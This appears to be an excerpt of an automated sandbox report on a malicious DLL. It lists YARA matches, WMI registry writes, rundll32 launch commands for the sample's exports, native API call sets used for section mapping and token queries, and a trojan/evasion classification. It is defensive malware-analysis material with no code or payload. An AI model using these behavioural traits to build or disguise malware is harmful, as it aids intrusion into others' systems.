                      Source: Yara matchFile source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4432, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.a30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 616412739e268.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D21B42_2_6E8D21B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A34C402_2_00A34C40
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3AF242_2_00A3AF24
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A32B762_2_00A32B76
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8E56002_2_6E8E5600
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E91D6302_2_6E91D630
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E933CCE2_2_6E933CCE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E91B5972_2_6E91B597
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E92A2B12_2_6E92A2B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E90E8C02_2_6E90E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031AAF246_2_031AAF24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031A2B766_2_031A2B76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031A4C406_2_031A4C40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E8E56006_2_6E8E5600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E91D6306_2_6E91D630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E933CCE6_2_6E933CCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E91B5976_2_6E91B597
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E92A2B16_2_6E92A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E93FA786_2_6E93FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E90E8C06_2_6E90E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E8E56009_2_6E8E5600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E91D6309_2_6E91D630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E933CCE9_2_6E933CCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E91B5979_2_6E91B597
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E92A2B19_2_6E92A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E90E8C09_2_6E90E8C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E90ABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E90AEC0 appears 36 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E90ABD1 appears 182 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E918487 appears 34 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D13B8 GetProcAddress,NtCreateSection,memset,2_2_6E8D13B8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,2_2_6E8D15C6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D1273 NtMapViewOfSection,2_2_6E8D1273
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D23D5 NtQueryVirtualMemory,2_2_6E8D23D5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A35D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_00A35D10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3B149 NtQueryVirtualMemory,2_2_00A3B149
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031A5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,6_2_031A5D10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031AB149 NtQueryVirtualMemory,6_2_031AB149
                      Source: 616412739e268.dllReversingLabs: Detection: 24%
                      Source: 616412739e268.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 628
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 848
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrassJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,FieldeightJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,OftenJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER923.tmpJump to behavior
                      Source: classification engineClassification label: mal88.troj.evad.winDLL@14/12@15/5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A34A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,2_2_00A34A03
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6084
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6012
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4360
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: 616412739e268.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 616412739e268.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbm source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.521737000.0000000000905000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb7 source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000012.00000003.512855279.0000000005701000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524487257.00000000050F4000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb.{Y@e source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.521724684.00000000008FF000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdbf{ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbl{ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb/ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000012.00000003.512855279.0000000005701000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524487257.00000000050F4000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000012.00000002.529162256.0000000002F92000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.551332599.0000000000632000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: winspool.pdb6{1@ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb0{?@ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb({G@r source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb0 source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000016.00000003.516470114.0000000004CA2000.00000004.00000001.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000018.00000003.521724684.00000000008FF000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbn source: WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbQ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbA source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
